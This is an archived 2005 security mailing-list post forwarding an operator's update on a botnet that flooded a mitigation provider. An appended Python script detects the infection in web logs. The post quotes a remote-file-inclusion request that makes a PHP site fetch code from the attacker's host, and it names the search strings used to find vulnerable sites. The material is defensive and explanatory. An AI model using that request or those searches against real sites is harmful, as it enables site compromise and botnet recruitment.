[Dshield] [Fwd: Re:Destructive botnet originating from Japan]

Chris Brenton cbrenton at chrisbrenton.org
Sat Dec 24 22:00:26 GMT 2005


The plot thickens...

-------- Forwarded Message --------
> From: Barrett G. Lyon <blyon at prolexic.com>
> To: nanog at merit.edu
> Subject: Re:Destructive botnet originating from Japan
> Date: Sat, 24 Dec 2005 10:44:10 -0800
> 
> Here is a little update:
> 
> As of last night authorities were able to seize the IRC server from
> the ISP in Japan and there will be extensive follow-up on it.  The DDoS
> attack is now running headless in the happy range of about 3+ Gbps at
> around 7-9M PPS.  The bots will continue attacking us until they
> receive the stop command from the bot master; there will never be a
> stop command, so we will continue to see packet love for a few months
> while people find that they are attacking us.  We will publish a new
> list of the bots on Monday as we idle with this low traffic rate over
> the weekend.
> 
> The attacker was targeting a couple customers that came into our  
> environment after other solutions failed to work for them.  After  
> reviewing and comparing notes, it is obvious that the attacks were  
> assassination attempts from a competitor.  There was no extortion  
> involved.
> 
> If you want to get the bots off your network, watch flow data  
> destined to AS32787 with SYN floods to TCP 80 as the destination.
> 
> Sites that use a PHP include (without validating the strings) to pull
> up different web sections and pages are at risk; a lot of people are
> reporting infection via "$section.php" and "$page.php". The attacker
> appears to have used Google to locate sites that use includes in that
> fashion (searching "index.php?page=" or "index.php?section=").
> 
> Reviewing infected machines for logs related to 210.170.60.2 would be
> an easy way to locate a past infection, but may not be reliable if the
> attacker starts a new botnet.  An example of the log data looks
> something like this:
> grep 210.170.60.2 access_log
> 210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
> 
> 
> Happy hunting and have nice holidays!
> 
> 
> -Barrett
> 
> --
> Barrett Lyon
> CTO and founder
> Prolexic Technologies, Inc
> 
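The grep above only catches the one loader address Barrett names. An added example (not from the forwarded message or from Prolexic) that generalizes the same check: it parses Apache combined-format access log lines and flags any request whose "page" or "section" parameter carries a remote URL, which is the unvalidated-include pattern the message describes, as well as any hit from the known loader host. The parameter names, the schemes checked and the sample log lines are assumptions; the 210.170.60.2 address is the one quoted above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format, the shape of the grep output quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
KNOWN_LOADER = "210.170.60.2"          # host named in the post; 2005-era, stale today
INCLUDE_PARAMS = {"page", "section"}   # parameters the post says fed unvalidated include()

def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def remote_include_params(target):
    """(param, value) pairs in the request target whose value is a remote URL."""
    hits = []
    # parse_qs percent-decodes once; unquote again so double-encoded values are caught too.
    for param, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        if param.lower() in INCLUDE_PARAMS:
            for value in values:
                decoded = unquote(value).lower()
                if decoded.startswith(("http://", "https://", "ftp://")):
                    hits.append((param, decoded))
    return hits

def scan_log(lines):
    """One finding per request that tried a remote include or came from the known loader."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue          # unparsable line: skip rather than abort the sweep
        hits = remote_include_params(entry["target"])
        if hits or entry["ip"] == KNOWN_LOADER:
            findings.append({"ip": entry["ip"], "time": entry["ts"], "status": entry["status"],
                             "known_loader": entry["ip"] == KNOWN_LOADER, "remote_includes": hits})
    return findings

# Constructed sample (not real traffic): line 1 is the post's example, rejoined onto one line;
# lines 2 and 3 are made up, using documentation addresses.
SAMPLE_LOG = [
    '210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"',
    '198.51.100.7 - - [23/Dec/2005:12:01:02 +0000] "GET /index.php?page=http%253A%252F%252F203.0.113.5%252Finc.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [23/Dec/2005:12:03:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]
```

Running `scan_log(SAMPLE_LOG)` returns two findings: the known-loader hit from the post and the double-encoded remote include from the second line; the ordinary `page=about` request is ignored.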
